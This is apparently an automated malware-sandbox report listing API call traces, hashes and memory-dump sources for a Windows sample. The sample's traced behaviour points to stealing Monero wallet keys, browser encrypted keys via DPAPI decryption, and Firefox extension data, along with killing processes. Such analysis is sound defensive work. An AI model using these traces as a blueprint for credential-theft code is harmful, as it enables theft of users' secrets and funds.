                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f25ef18cf311b725eee6334964ca30e7236c8728d15c3b8e807989cd843b2046
                        • Instruction ID: 6b22fdc6101993b8f8c894dc39e1b60354e547ff1b9aa2a0a24f76dd3dc69162
                        • Opcode Fuzzy Hash: f25ef18cf311b725eee6334964ca30e7236c8728d15c3b8e807989cd843b2046
                        • Instruction Fuzzy Hash: 1C91E3729201089BDB04FBA4DC96DEE7338AF94310F50C169F51BA6091EF346A69CF67
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 00278B60: GetSystemTime.KERNEL32(00280E1A,00E2A610,002805AE,?,?,002613F9,?,0000001A,00280E1A,00000000,?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 00278B86
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0026D801
                        • lstrlen.KERNEL32(00000000), ref: 0026D99F
                        • lstrlen.KERNEL32(00000000), ref: 0026D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0026DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 7e36287ee9e11dc52c42ee502d7507bd13b129ce7611c43a2a32971683a41689
                        • Instruction ID: 8f0b3d8fc0ec6658184eace0f1f769d8f5ebe1348cc0ec4b06e0e179fbb08a10
                        • Opcode Fuzzy Hash: 7e36287ee9e11dc52c42ee502d7507bd13b129ce7611c43a2a32971683a41689
                        • Instruction Fuzzy Hash: 0081E0729201089ADB04FBA4DC96DEE7738AF94310F508529F51BA6091EF346A29CF67
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 0027A920: lstrcpy.KERNEL32(00000000,?), ref: 0027A972
                          • Part of subcall function 0027A920: lstrcat.KERNEL32(00000000), ref: 0027A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00281580,00280D92), ref: 0026F54C
                        • lstrlen.KERNEL32(00000000), ref: 0026F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 724a6b715578aa8f2ff16e872ef87562ec33b4bf94383f0f2480fcf70a7f1afa
                        • Instruction ID: 1707d58ebd58417f3b4270363a08341fddbdee537eac0c3bdb0b3b8c6bb606d7
                        • Opcode Fuzzy Hash: 724a6b715578aa8f2ff16e872ef87562ec33b4bf94383f0f2480fcf70a7f1afa
                        • Instruction Fuzzy Hash: 56511375D201089ADB08FBB4DC96DEE737CAF94310F40C528F51A67191EE346A29CFA2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: d0aae99a2134a5bc809aa97a49ea4df9d08501dfefcb3e2e3509236a697b9bb0
                        • Instruction ID: 886c0362b45a1cca7cdaa34bba133a87fd24e54a752d84ecd45a91f7984b0942
                        • Opcode Fuzzy Hash: d0aae99a2134a5bc809aa97a49ea4df9d08501dfefcb3e2e3509236a697b9bb0
                        • Instruction Fuzzy Hash: 90416375D20109ABCB04EFE4D885AEEB778AF54314F00C018E51A77291DB74AA29DF96
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 002699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002699EC
                          • Part of subcall function 002699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00269A11
                          • Part of subcall function 002699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00269A31
                          • Part of subcall function 002699C0: ReadFile.KERNEL32(000000FF,?,00000000,0026148F,00000000), ref: 00269A5A
                          • Part of subcall function 002699C0: LocalFree.KERNEL32(0026148F), ref: 00269A90
                          • Part of subcall function 002699C0: CloseHandle.KERNEL32(000000FF), ref: 00269A9A
                          • Part of subcall function 00278E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00278E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00269D39
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269AEF
                          • Part of subcall function 00269AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00264EEE,00000000,?), ref: 00269B01
                          • Part of subcall function 00269AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N&,00000000,00000000), ref: 00269B2A
                          • Part of subcall function 00269AC0: LocalFree.KERNEL32(?,?,?,?,00264EEE,00000000,?), ref: 00269B3F
                          • Part of subcall function 00269B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00269B84
                          • Part of subcall function 00269B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00269BA3
                          • Part of subcall function 00269B60: LocalFree.KERNEL32(?), ref: 00269BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: fbcc1a7fc83cea749a552e6bf9d092339f51a603261e8bcc3aa26642f6a55146
                        • Instruction ID: 651c4ee3c7674a8852d9cccae172295f725cd3530ba4c1a5ec97a8a8529ab512
                        • Opcode Fuzzy Hash: fbcc1a7fc83cea749a552e6bf9d092339f51a603261e8bcc3aa26642f6a55146
                        • Instruction Fuzzy Hash: 4E3136B5D20109ABDF04EFD4DC85AEFB7BCBF48304F144569E905A7241EB309AA5CBA1
                        APIs
                        • memset.MSVCRT ref: 002794EB
                          • Part of subcall function 00278D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0027951E,00000000), ref: 00278D5B
                          • Part of subcall function 00278D50: RtlAllocateHeap.NTDLL(00000000), ref: 00278D62
                          • Part of subcall function 00278D50: wsprintfW.USER32 ref: 00278D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 002795AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 002795C9
                        • CloseHandle.KERNEL32(00000000), ref: 002795D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 92fea2a2bc0396de09950271458d122488612082b1c85fee1d820b137362de3f
                        • Instruction ID: 9a2ea96a532adf1d566725834c1f7bab9da5dd13dd8b68414c7fa3add954c63f
                        • Opcode Fuzzy Hash: 92fea2a2bc0396de09950271458d122488612082b1c85fee1d820b137362de3f
                        • Instruction Fuzzy Hash: 1B314D71E103189FDB14DFE0CC49BEDB778EB44300F508469E50AAB184DB74AA99CF52
                        APIs
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002805B7), ref: 002786CA
                        • Process32First.KERNEL32(?,00000128), ref: 002786DE
                        • Process32Next.KERNEL32(?,00000128), ref: 002786F3
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • CloseHandle.KERNEL32(?), ref: 00278761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: aa8260646ce6809d3aca52ceb0671d5c108efc53ae443b800cab94bc185ead23
                        • Instruction ID: 0219d916d30843015d054a198d3d010f8ff8f826c5022267afadca5082ab3cff
                        • Opcode Fuzzy Hash: aa8260646ce6809d3aca52ceb0671d5c108efc53ae443b800cab94bc185ead23
                        • Instruction Fuzzy Hash: 7B314D71921218ABCB24EF54CC85FEEB778EF45710F1081A9E10EA61A0DB346A55CFA2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00280E00,00000000,?), ref: 002779B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 002779B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00280E00,00000000,?), ref: 002779C4
                        • wsprintfA.USER32 ref: 002779F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 31e984d15bbc78295bfbe927b9aeb3a3a1f548cb17acca013853972b01e6af00
                        • Instruction ID: 3f07c8f60c2c82018c9e2a19275e0e50db425eacf932475d1144c49c836de653
                        • Opcode Fuzzy Hash: 31e984d15bbc78295bfbe927b9aeb3a3a1f548cb17acca013853972b01e6af00
                        • Instruction Fuzzy Hash: 5D1127B2904118ABCB14DFC9DD45BBEBBF8FB4DB11F10421AF605A2280E3795950CBB5
                        APIs
                        • __getptd.LIBCMT ref: 0027C74E
                          • Part of subcall function 0027BF9F: __amsg_exit.LIBCMT ref: 0027BFAF
                        • __getptd.LIBCMT ref: 0027C765
                        • __amsg_exit.LIBCMT ref: 0027C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0027C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: fe0ae6e344d74c6bb28c83a67a512bb71c68f88192be38cd81ad1333db12b201
                        • Instruction ID: d20aedff09891486335c002585cedda31fbf8e1010b035211b89e2c1fb1bcff6
                        • Opcode Fuzzy Hash: fe0ae6e344d74c6bb28c83a67a512bb71c68f88192be38cd81ad1333db12b201
                        • Instruction Fuzzy Hash: 86F090329256019BD726BFB8584775E73A06F00B20F30C14DF40CA65D2CF7459709F56
                        APIs
                          • Part of subcall function 00278DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00278E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00274F7A
                        • lstrcat.KERNEL32(?,00281070), ref: 00274F97
                        • lstrcat.KERNEL32(?,00E28FC0), ref: 00274FAB
                        • lstrcat.KERNEL32(?,00281074), ref: 00274FBD
                          • Part of subcall function 00274910: wsprintfA.USER32 ref: 0027492C
                          • Part of subcall function 00274910: FindFirstFileA.KERNEL32(?,?), ref: 00274943
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FDC), ref: 00274971
                          • Part of subcall function 00274910: StrCmpCA.SHLWAPI(?,00280FE0), ref: 00274987
                          • Part of subcall function 00274910: FindNextFileA.KERNEL32(000000FF,?), ref: 00274B7D
                          • Part of subcall function 00274910: FindClose.KERNEL32(000000FF), ref: 00274B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: ae44817ddaf6adf7bd1092965bc39ed97d450598cc39c378159cda8179d30aeb
                        • Instruction ID: 2eb3d02124ba77f34f5d36f0b8b77c77bd6a68975f3633bbf95e14b93306388a
                        • Opcode Fuzzy Hash: ae44817ddaf6adf7bd1092965bc39ed97d450598cc39c378159cda8179d30aeb
                        • Instruction Fuzzy Hash: 7421DDB6910204A7C794FB70DC46EED773CAB55300F004558B65A921C1EF749AF9CF96